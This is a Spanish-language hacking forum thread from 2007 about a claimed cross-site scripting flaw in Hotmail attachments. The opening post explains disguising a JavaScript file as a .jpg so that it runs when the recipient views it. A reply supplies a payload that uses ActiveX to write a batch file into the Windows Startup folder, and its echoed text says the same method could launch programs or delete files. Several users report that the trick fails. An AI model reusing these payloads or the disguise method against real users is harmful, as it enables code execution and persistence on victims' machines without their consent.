hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
08 de Julio de 2008, 10:52:38
Noticias: Que importa si no sabes programar, CPH te enseña, solo haz click
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, HolyKnight, kamui23, - TuX -)
| | |-+  Nueva vulnerabilidad en Hotmail
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Nueva vulnerabilidad en Hotmail  (Leído 561 veces)
Dark Allien
NZ1
*
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« : 09 de Mayo de 2007, 06:35:20 »

Me encontre navegando por ahy que el hotmail tiene un  nuevo fallo de Cross Site Scripting en Hotmail, total el perro hotmail no canta nada si envias un archivo de texto echo por ejemplo con el bloc de notas con código javascript por ejemplo de una alerta:


<script language="JavaScript">
  alert(' ZaBoo script alert');
</script>

 y lo guardas con formato "jpg", bueno luego lo adjuntas y envias y al recibir el archivo y probar en ver el adjunto pum kiss te ejecuta el codigo, para mas informacion dirigirse a http://www.cyruxnet.org/news.htm o http://cyruxnet.org/foro/viewtopic.php?t=559

By: Dark allien
En línea
piojo_tem
Visitante
« Respuesta #1 : 09 de Mayo de 2007, 02:21:15 »

a mi no me funka :S
En línea
matrix_hc85
NZ2
**
Desconectado Desconectado

Mensajes: 221


pasemonos a linux y seamos libres xD


Ver Perfil
« Respuesta #2 : 09 de Mayo de 2007, 08:45:41 »

a mi tampoco.  sera q funciona en alguna version beta de hotmail?
En línea

peru/machu-picchu, maravilla del mundo. atte zYrox
maxwellnewage
Colaborador
****
Desconectado Desconectado

Mensajes: 729



Ver Perfil WWW
« Respuesta #3 : 10 de Mayo de 2007, 05:44:31 »

aca un code q les sirve......... ....
<script language="JavaScript">
Contenido=
  '@echo off\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo Esto es solo una prueba, pero podria haber llamado a algun programa...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O podria, tambien, detener o activar procesos...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O, incluso, podria haber borrado algun archivo...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo No se... echale imaginacion...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'exit\r\n'
Archivo=new ActiveXObject("Scripting.File SystemObject")
Escribe=Archivo.CreateTextFile("c:\\Documents and Settings\\Administrador\\Menú Inicio\\Programas\\Inicio\\bat.bat" ,true);
Escribe.WriteL ine(Contenido);
Escribe.close();
</script>
En línea
matrix_hc85
NZ2
**
Desconectado Desconectado

Mensajes: 221


pasemonos a linux y seamos libres xD


Ver Perfil
« Respuesta #4 : 10 de Mayo de 2007, 02:02:58 »

ok. perfecto. voy a probar, pero deberia funcionar para cualquier codigo en script !! no solo en el que creas tu, sino que sentido tiene. 
En línea

peru/machu-picchu, maravilla del mundo. atte zYrox
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online